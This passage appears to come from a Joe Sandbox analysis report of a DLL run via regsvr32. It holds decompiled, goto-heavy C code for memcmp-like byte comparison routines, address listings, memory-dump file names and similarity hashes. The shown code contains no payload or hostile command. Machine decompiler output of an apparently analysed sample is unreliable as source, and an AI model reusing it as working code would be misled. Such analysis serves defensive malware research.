                                                                                                        					__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                        					__esi = __edx;
                                                                                                        					if(__edx != 0) {
                                                                                                        						goto L1;
                                                                                                        					}
                                                                                                        					goto L10;
                                                                                                        				}
                                                                                                        				L1:
                                                                                                        				_t197 = _t316;
                                                                                                        				goto L2;
                                                                                                        			}

































                                                                                                        0x1001929d
                                                                                                        0x1001929d
                                                                                                        0x100192a3
                                                                                                        0x10019323
                                                                                                        0x10019325
                                                                                                        0x10019327
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001932d
                                                                                                        0x10019333
                                                                                                        0x100193b2
                                                                                                        0x100193b4
                                                                                                        0x100193b6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100193bc
                                                                                                        0x100193c2
                                                                                                        0x10019441
                                                                                                        0x10019443
                                                                                                        0x10019445
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001944b
                                                                                                        0x10019451
                                                                                                        0x100194d0
                                                                                                        0x100194d2
                                                                                                        0x100194d4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100194e0
                                                                                                        0x10019560
                                                                                                        0x10019562
                                                                                                        0x10019564
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001956a
                                                                                                        0x10019570
                                                                                                        0x100195ef
                                                                                                        0x100195f1
                                                                                                        0x100195f3
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100195f9
                                                                                                        0x100195ff
                                                                                                        0x1001967e
                                                                                                        0x10019680
                                                                                                        0x10019682
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10019690
                                                                                                        0x10019692
                                                                                                        0x10019275
                                                                                                        0x1001927d
                                                                                                        0x1001927f
                                                                                                        0x10018e5b
                                                                                                        0x10018e63
                                                                                                        0x10018e65
                                                                                                        0x10018e76
                                                                                                        0x10018e76
                                                                                                        0x10018a6b
                                                                                                        0x100197c7
                                                                                                        0x100197c7
                                                                                                        0x1001928c
                                                                                                        0x10019292
                                                                                                        0x100196ab
                                                                                                        0x100196ab
                                                                                                        0x00000000
                                                                                                        0x10019298
                                                                                                        0x00000000
                                                                                                        0x10019298
                                                                                                        0x10019292
                                                                                                        0x1001969f
                                                                                                        0x100196a5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100196a5
                                                                                                        0x10019608
                                                                                                        0x1001960a
                                                                                                        0x10019621
                                                                                                        0x10019629
                                                                                                        0x1001962b
                                                                                                        0x10019642
                                                                                                        0x1001964a
                                                                                                        0x1001964c
                                                                                                        0x10019663
                                                                                                        0x1001966b
                                                                                                        0x1001966d
                                                                                                        0x1001967a
                                                                                                        0x1001967a
                                                                                                        0x00000000
                                                                                                        0x1001966d
                                                                                                        0x10019659
                                                                                                        0x1001965d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001965d
                                                                                                        0x10019638
                                                                                                        0x1001963c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001963c
                                                                                                        0x10019617
                                                                                                        0x1001961b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001961b
                                                                                                        0x10019579
                                                                                                        0x1001957b
                                                                                                        0x10019592
                                                                                                        0x1001959a
                                                                                                        0x1001959c
                                                                                                        0x100195b3
                                                                                                        0x100195bb
                                                                                                        0x100195bd
                                                                                                        0x100195d4
                                                                                                        0x100195dc
                                                                                                        0x100195de
                                                                                                        0x100195eb
                                                                                                        0x100195eb
                                                                                                        0x00000000
                                                                                                        0x100195de
                                                                                                        0x100195ca
                                                                                                        0x100195ce
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100195ce
                                                                                                        0x100195a9
                                                                                                        0x100195ad
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100195ad
                                                                                                        0x10019588
                                                                                                        0x1001958c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001958c
                                                                                                        0x100194ea
                                                                                                        0x100194ec
                                                                                                        0x10019503
                                                                                                        0x1001950b
                                                                                                        0x1001950d
                                                                                                        0x10019524
                                                                                                        0x1001952c
                                                                                                        0x1001952e
                                                                                                        0x10019545
                                                                                                        0x1001954d
                                                                                                        0x1001954f
                                                                                                        0x1001955c
                                                                                                        0x1001955c
                                                                                                        0x00000000
                                                                                                        0x1001954f
                                                                                                        0x1001953b
                                                                                                        0x1001953f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001953f
                                                                                                        0x1001951a
                                                                                                        0x1001951e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001951e
                                                                                                        0x100194f9
                                                                                                        0x100194fd
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100194fd
                                                                                                        0x1001945a
                                                                                                        0x1001945c
                                                                                                        0x10019473
                                                                                                        0x1001947b
                                                                                                        0x1001947d
                                                                                                        0x10019494
                                                                                                        0x1001949c
                                                                                                        0x1001949e
                                                                                                        0x100194b5
                                                                                                        0x100194bd
                                                                                                        0x100194bf
                                                                                                        0x100194cc
                                                                                                        0x100194cc
                                                                                                        0x00000000
                                                                                                        0x100194bf
                                                                                                        0x100194ab
                                                                                                        0x100194af
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100194af
                                                                                                        0x1001948a
                                                                                                        0x1001948e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001948e
                                                                                                        0x10019469
                                                                                                        0x1001946d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001946d
                                                                                                        0x100193cb
                                                                                                        0x100193cd
                                                                                                        0x100193e4
                                                                                                        0x100193ec
                                                                                                        0x100193ee
                                                                                                        0x10019405
                                                                                                        0x1001940d
                                                                                                        0x1001940f
                                                                                                        0x10019426
                                                                                                        0x1001942e
                                                                                                        0x10019430
                                                                                                        0x1001943d
                                                                                                        0x1001943d
                                                                                                        0x00000000
                                                                                                        0x10019430
                                                                                                        0x1001941c
                                                                                                        0x10019420
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10019420
                                                                                                        0x100193fb
                                                                                                        0x100193ff
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100193ff
                                                                                                        0x100193da
                                                                                                        0x100193de
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100193de
                                                                                                        0x1001933c
                                                                                                        0x1001933e
                                                                                                        0x10019355
                                                                                                        0x1001935d
                                                                                                        0x1001935f
                                                                                                        0x10019376
                                                                                                        0x1001937e
                                                                                                        0x10019380
                                                                                                        0x10019397
                                                                                                        0x1001939f
                                                                                                        0x100193a1
                                                                                                        0x100193ae
                                                                                                        0x100193ae
                                                                                                        0x00000000
                                                                                                        0x100193a1
                                                                                                        0x1001938d
                                                                                                        0x10019391
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10019391
                                                                                                        0x1001936c
                                                                                                        0x10019370
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10019370
                                                                                                        0x1001934b
                                                                                                        0x1001934f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100192a5
                                                                                                        0x100192a5
                                                                                                        0x100192a9
                                                                                                        0x100192ad
                                                                                                        0x100192af
                                                                                                        0x100192c6
                                                                                                        0x100192c6
                                                                                                        0x100192ca
                                                                                                        0x100192ce
                                                                                                        0x100192d0
                                                                                                        0x100192e7
                                                                                                        0x100192e7
                                                                                                        0x100192eb
                                                                                                        0x100192ef
                                                                                                        0x100192f1
                                                                                                        0x10019308
                                                                                                        0x10019308
                                                                                                        0x1001930c
                                                                                                        0x10019310
                                                                                                        0x10019312
                                                                                                        0x10019318
                                                                                                        0x1001931b
                                                                                                        0x1001931f
                                                                                                        0x1001931f
                                                                                                        0x00000000
                                                                                                        0x10019312
                                                                                                        0x100192f7
                                                                                                        0x100192fa
                                                                                                        0x100192fe
                                                                                                        0x10019302
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10019302
                                                                                                        0x100192d6
                                                                                                        0x100192d9
                                                                                                        0x100192dd
                                                                                                        0x100192e1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100192e1
                                                                                                        0x100192b5
                                                                                                        0x100192b8
                                                                                                        0x100192bc
                                                                                                        0x100192c0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100192c0
                                                                                                        0x10018696
                                                                                                        0x10018696
                                                                                                        0x00000000

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                        • Instruction ID: bcf109f5de06b5c94f6bb42cf1b44ca8dbb3bfcebafd793729c585c81d35ca35
                                                                                                        • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                        • Instruction Fuzzy Hash: E0D15F73C0AAB30A8376C12D415862EEEE2AFC199531BC7E1DCD43F289D136DE8596D0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10018E7D(void* __eax, void* __ecx) {
                                                                                                        				void* _t191;
                                                                                                        				signed int _t192;
                                                                                                        				void* _t195;
                                                                                                        				signed char _t201;
                                                                                                        				signed char _t202;
                                                                                                        				signed char _t203;
                                                                                                        				signed char _t204;
                                                                                                        				signed char _t206;
                                                                                                        				signed int _t211;
                                                                                                        				signed int _t309;
                                                                                                        				void* _t312;
                                                                                                        				void* _t314;
                                                                                                        				void* _t316;
                                                                                                        				void* _t318;
                                                                                                        				void* _t321;
                                                                                                        				void* _t323;
                                                                                                        				void* _t325;
                                                                                                        				void* _t328;
                                                                                                        				void* _t330;
                                                                                                        				void* _t332;
                                                                                                        				void* _t335;
                                                                                                        				void* _t337;
                                                                                                        				void* _t339;
                                                                                                        				void* _t342;
                                                                                                        				void* _t344;
                                                                                                        				void* _t346;
                                                                                                        				void* _t349;
                                                                                                        				void* _t351;
                                                                                                        				void* _t353;
                                                                                                        
                                                                                                        				_t195 = __ecx;
                                                                                                        				_t191 = __eax;
                                                                                                        				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
                                                                                                        					_t309 = 0;
                                                                                                        					L15:
                                                                                                        					if(_t309 != 0) {
                                                                                                        						goto L1;
                                                                                                        					}
                                                                                                        					_t201 =  *(_t191 - 0x1a);
                                                                                                        					if(_t201 ==  *(_t195 - 0x1a)) {
                                                                                                        						_t309 = 0;
                                                                                                        						L26:
                                                                                                        						if(_t309 != 0) {
                                                                                                        							goto L1;
                                                                                                        						}
                                                                                                        						_t202 =  *(_t191 - 0x16);
                                                                                                        						if(_t202 ==  *(_t195 - 0x16)) {
                                                                                                        							_t309 = 0;
                                                                                                        							L37:
                                                                                                        							if(_t309 != 0) {
                                                                                                        								goto L1;
                                                                                                        							}
                                                                                                        							_t203 =  *(_t191 - 0x12);
                                                                                                        							if(_t203 ==  *(_t195 - 0x12)) {
                                                                                                        								_t309 = 0;
                                                                                                        								L48:
                                                                                                        								if(_t309 != 0) {
                                                                                                        									goto L1;
                                                                                                        								}
                                                                                                        								_t204 =  *(_t191 - 0xe);
                                                                                                        								if(_t204 ==  *(_t195 - 0xe)) {
                                                                                                        									_t309 = 0;
                                                                                                        									L59:
                                                                                                        									if(_t309 != 0) {
                                                                                                        										goto L1;
                                                                                                        									}
                                                                                                        									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
                                                                                                        										_t309 = 0;
                                                                                                        										L70:
                                                                                                        										if(_t309 != 0) {
                                                                                                        											goto L1;
                                                                                                        										}
                                                                                                        										_t206 =  *(_t191 - 6);
                                                                                                        										if(_t206 ==  *(_t195 - 6)) {
                                                                                                        											_t309 = 0;
                                                                                                        											L81:
                                                                                                        											if(_t309 != 0) {
                                                                                                        												goto L1;
                                                                                                        											}
                                                                                                        											if( *(_t191 - 2) ==  *(_t195 - 2)) {
                                                                                                        												_t192 = 0;
                                                                                                        												L3:
                                                                                                        												return _t192;
                                                                                                        											}
                                                                                                        											_t312 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
                                                                                                        											if(_t312 == 0) {
                                                                                                        												L4:
                                                                                                        												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
                                                                                                        												if(_t192 != 0) {
                                                                                                        													_t192 = (0 | _t192 > 0x00000000) + (0 | _t192 > 0x00000000) - 1;
                                                                                                        												}
                                                                                                        												goto L3;
                                                                                                        											}
                                                                                                        											_t211 = (0 | _t312 > 0x00000000) + (0 | _t312 > 0x00000000) - 1;
                                                                                                        											if(_t211 != 0) {
                                                                                                        												_t192 = _t211;
                                                                                                        												goto L3;
                                                                                                        											}
                                                                                                        											goto L4;
                                                                                                        										}
                                                                                                        										_t314 = (_t206 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
                                                                                                        										if(_t314 == 0) {
                                                                                                        											L74:
                                                                                                        											_t316 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
                                                                                                        											if(_t316 == 0) {
                                                                                                        												L76:
                                                                                                        												_t318 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
                                                                                                        												if(_t318 == 0) {
                                                                                                        													L78:
                                                                                                        													_t309 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
                                                                                                        													if(_t309 != 0) {
                                                                                                        														_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                                        													}
                                                                                                        													goto L81;
                                                                                                        												}
                                                                                                        												_t309 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
                                                                                                        												if(_t309 != 0) {
                                                                                                        													goto L1;
                                                                                                        												}
                                                                                                        												goto L78;
                                                                                                        											}
                                                                                                        											_t309 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                        											if(_t309 != 0) {
                                                                                                        												goto L1;
                                                                                                        											}
                                                                                                        											goto L76;
                                                                                                        										}
                                                                                                        										_t309 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
                                                                                                        										if(_t309 != 0) {
                                                                                                        											goto L1;
                                                                                                        										}
                                                                                                        										goto L74;
                                                                                                        									}
                                                                                                        									_t321 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
                                                                                                        									if(_t321 == 0) {
                                                                                                        										L63:
                                                                                                        										_t323 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
                                                                                                        										if(_t323 == 0) {
                                                                                                        											L65:
                                                                                                        											_t325 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
                                                                                                        											if(_t325 == 0) {
                                                                                                        												L67:
                                                                                                        												_t309 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
                                                                                                        												if(_t309 != 0) {
                                                                                                        													_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                                        												}
                                                                                                        												goto L70;
                                                                                                        											}
                                                                                                        											_t309 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
                                                                                                        											if(_t309 != 0) {
                                                                                                        												goto L1;
                                                                                                        											}
                                                                                                        											goto L67;
                                                                                                        										}
                                                                                                        										_t309 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
                                                                                                        										if(_t309 != 0) {
                                                                                                        											goto L1;
                                                                                                        										}
                                                                                                        										goto L65;
                                                                                                        									}
                                                                                                        									_t309 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
                                                                                                        									if(_t309 != 0) {
                                                                                                        										goto L1;
                                                                                                        									}
                                                                                                        									goto L63;
                                                                                                        								}
                                                                                                        								_t328 = (_t204 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
                                                                                                        								if(_t328 == 0) {
                                                                                                        									L52:
                                                                                                        									_t330 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
                                                                                                        									if(_t330 == 0) {
                                                                                                        										L54:
                                                                                                        										_t332 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
                                                                                                        										if(_t332 == 0) {
                                                                                                        											L56:
                                                                                                        											_t309 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
                                                                                                        											if(_t309 != 0) {
                                                                                                        												_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                                        											}
                                                                                                        											goto L59;
                                                                                                        										}
                                                                                                        										_t309 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
                                                                                                        										if(_t309 != 0) {
                                                                                                        											goto L1;
                                                                                                        										}
                                                                                                        										goto L56;
                                                                                                        									}
                                                                                                        									_t309 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
                                                                                                        									if(_t309 != 0) {
                                                                                                        										goto L1;
                                                                                                        									}
                                                                                                        									goto L54;
                                                                                                        								}
                                                                                                        								_t309 = (0 | _t328 > 0x00000000) + (0 | _t328 > 0x00000000) - 1;
                                                                                                        								if(_t309 != 0) {
                                                                                                        									goto L1;
                                                                                                        								}
                                                                                                        								goto L52;
                                                                                                        							}
                                                                                                        							_t335 = (_t203 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
                                                                                                        							if(_t335 == 0) {
                                                                                                        								L41:
                                                                                                        								_t337 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
                                                                                                        								if(_t337 == 0) {
                                                                                                        									L43:
                                                                                                        									_t339 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
                                                                                                        									if(_t339 == 0) {
                                                                                                        										L45:
                                                                                                        										_t309 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
                                                                                                        										if(_t309 != 0) {
                                                                                                        											_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                                        										}
                                                                                                        										goto L48;
                                                                                                        									}
                                                                                                        									_t309 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
                                                                                                        									if(_t309 != 0) {
                                                                                                        										goto L1;
                                                                                                        									}
                                                                                                        									goto L45;
                                                                                                        								}
                                                                                                        								_t309 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
                                                                                                        								if(_t309 != 0) {
                                                                                                        									goto L1;
                                                                                                        								}
                                                                                                        								goto L43;
                                                                                                        							}
                                                                                                        							_t309 = (0 | _t335 > 0x00000000) + (0 | _t335 > 0x00000000) - 1;
                                                                                                        							if(_t309 != 0) {
                                                                                                        								goto L1;
                                                                                                        							}
                                                                                                        							goto L41;
                                                                                                        						}
                                                                                                        						_t342 = (_t202 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
                                                                                                        						if(_t342 == 0) {
                                                                                                        							L30:
                                                                                                        							_t344 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
                                                                                                        							if(_t344 == 0) {
                                                                                                        								L32:
                                                                                                        								_t346 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
                                                                                                        								if(_t346 == 0) {
                                                                                                        									L34:
                                                                                                        									_t309 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
                                                                                                        									if(_t309 != 0) {
                                                                                                        										_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                                        									}
                                                                                                        									goto L37;
                                                                                                        								}
                                                                                                        								_t309 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
                                                                                                        								if(_t309 != 0) {
                                                                                                        									goto L1;
                                                                                                        								}
                                                                                                        								goto L34;
                                                                                                        							}
                                                                                                        							_t309 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
                                                                                                        							if(_t309 != 0) {
                                                                                                        								goto L1;
                                                                                                        							}
                                                                                                        							goto L32;
                                                                                                        						}
                                                                                                        						_t309 = (0 | _t342 > 0x00000000) + (0 | _t342 > 0x00000000) - 1;
                                                                                                        						if(_t309 != 0) {
                                                                                                        							goto L1;
                                                                                                        						}
                                                                                                        						goto L30;
                                                                                                        					}
                                                                                                        					_t349 = (_t201 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
                                                                                                        					if(_t349 == 0) {
                                                                                                        						L19:
                                                                                                        						_t351 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
                                                                                                        						if(_t351 == 0) {
                                                                                                        							L21:
                                                                                                        							_t353 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
                                                                                                        							if(_t353 == 0) {
                                                                                                        								L23:
                                                                                                        								_t309 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
                                                                                                        								if(_t309 != 0) {
                                                                                                        									_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                                        								}
                                                                                                        								goto L26;
                                                                                                        							}
                                                                                                        							_t309 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
                                                                                                        							if(_t309 != 0) {
                                                                                                        								goto L1;
                                                                                                        							}
                                                                                                        							goto L23;
                                                                                                        						}
                                                                                                        						_t309 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
                                                                                                        						if(_t309 != 0) {
                                                                                                        							goto L1;
                                                                                                        						}
                                                                                                        						goto L21;
                                                                                                        					}
                                                                                                        					_t309 = (0 | _t349 > 0x00000000) + (0 | _t349 > 0x00000000) - 1;
                                                                                                        					if(_t309 != 0) {
                                                                                                        						goto L1;
                                                                                                        					}
                                                                                                        					goto L19;
                                                                                                        				} else {
                                                                                                        					__esi = __dl & 0x000000ff;
                                                                                                        					__edx =  *(__ecx - 0x1e) & 0x000000ff;
                                                                                                        					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
                                                                                                        					if(__esi == 0) {
                                                                                                        						L8:
                                                                                                        						__esi =  *(__eax - 0x1d) & 0x000000ff;
                                                                                                        						__edx =  *(__ecx - 0x1d) & 0x000000ff;
                                                                                                        						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                                                                                                        						if(__esi == 0) {
                                                                                                        							L10:
                                                                                                        							__esi =  *(__eax - 0x1c) & 0x000000ff;
                                                                                                        							__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                                        							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                                        							if(__esi == 0) {
                                                                                                        								L12:
                                                                                                        								__esi =  *(__eax - 0x1b) & 0x000000ff;
                                                                                                        								__edx =  *(__ecx - 0x1b) & 0x000000ff;
                                                                                                        								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                                                                                                        								if(__esi != 0) {
                                                                                                        									0 = 0 | __esi > 0x00000000;
                                                                                                        									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                        									__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                        								}
                                                                                                        								goto L15;
                                                                                                        							}
                                                                                                        							0 = 0 | __esi > 0x00000000;
                                                                                                        							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                        							__esi = __edx;
                                                                                                        							if(__edx != 0) {
                                                                                                        								goto L1;
                                                                                                        							}
                                                                                                        							goto L12;
                                                                                                        						}
                                                                                                        						0 = 0 | __esi > 0x00000000;
                                                                                                        						__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                        						__esi = __edx;
                                                                                                        						if(__edx != 0) {
                                                                                                        							goto L1;
                                                                                                        						}
                                                                                                        						goto L10;
                                                                                                        					}
                                                                                                        					0 = 0 | __esi > 0x00000000;
                                                                                                        					__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                        					__esi = __edx;
                                                                                                        					if(__edx != 0) {
                                                                                                        						goto L1;
                                                                                                        					}
                                                                                                        					goto L8;
                                                                                                        				}
                                                                                                        				L1:
                                                                                                        				_t192 = _t309;
                                                                                                        				goto L3;
                                                                                                        			}
































                                                                                                        0x10018e7d
                                                                                                        0x10018e7d
                                                                                                        0x10018e83
                                                                                                        0x10018f02
                                                                                                        0x10018f04
                                                                                                        0x10018f06
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018f0c
                                                                                                        0x10018f12
                                                                                                        0x10018f91
                                                                                                        0x10018f93
                                                                                                        0x10018f95
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018f9b
                                                                                                        0x10018fa1
                                                                                                        0x10019020
                                                                                                        0x10019022
                                                                                                        0x10019024
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001902a
                                                                                                        0x10019030
                                                                                                        0x100190af
                                                                                                        0x100190b1
                                                                                                        0x100190b3
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100190b9
                                                                                                        0x100190bf
                                                                                                        0x1001913e
                                                                                                        0x10019140
                                                                                                        0x10019142
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001914e
                                                                                                        0x100191ce
                                                                                                        0x100191d0
                                                                                                        0x100191d2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100191d8
                                                                                                        0x100191de
                                                                                                        0x1001925d
                                                                                                        0x1001925f
                                                                                                        0x10019261
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001926f
                                                                                                        0x10018a69
                                                                                                        0x10018a6b
                                                                                                        0x100197c7
                                                                                                        0x100197c7
                                                                                                        0x1001927d
                                                                                                        0x1001927f
                                                                                                        0x10018e5b
                                                                                                        0x10018e63
                                                                                                        0x10018e65
                                                                                                        0x10018e76
                                                                                                        0x10018e76
                                                                                                        0x00000000
                                                                                                        0x10018e65
                                                                                                        0x1001928c
                                                                                                        0x10019292
                                                                                                        0x100196ab
                                                                                                        0x00000000
                                                                                                        0x100196ab
                                                                                                        0x00000000
                                                                                                        0x10019298
                                                                                                        0x100191e7
                                                                                                        0x100191e9
                                                                                                        0x10019200
                                                                                                        0x10019208
                                                                                                        0x1001920a
                                                                                                        0x10019221
                                                                                                        0x10019229
                                                                                                        0x1001922b
                                                                                                        0x10019242
                                                                                                        0x1001924a
                                                                                                        0x1001924c
                                                                                                        0x10019259
                                                                                                        0x10019259
                                                                                                        0x00000000
                                                                                                        0x1001924c
                                                                                                        0x10019238
                                                                                                        0x1001923c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001923c
                                                                                                        0x10019217
                                                                                                        0x1001921b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001921b
                                                                                                        0x100191f6
                                                                                                        0x100191fa
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100191fa
                                                                                                        0x10019158
                                                                                                        0x1001915a
                                                                                                        0x10019171
                                                                                                        0x10019179
                                                                                                        0x1001917b
                                                                                                        0x10019192
                                                                                                        0x1001919a
                                                                                                        0x1001919c
                                                                                                        0x100191b3
                                                                                                        0x100191bb
                                                                                                        0x100191bd
                                                                                                        0x100191ca
                                                                                                        0x100191ca
                                                                                                        0x00000000
                                                                                                        0x100191bd
                                                                                                        0x100191a9
                                                                                                        0x100191ad
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100191ad
                                                                                                        0x10019188
                                                                                                        0x1001918c
                                                                                                        0x00000000
                                                                                                        0x00000000
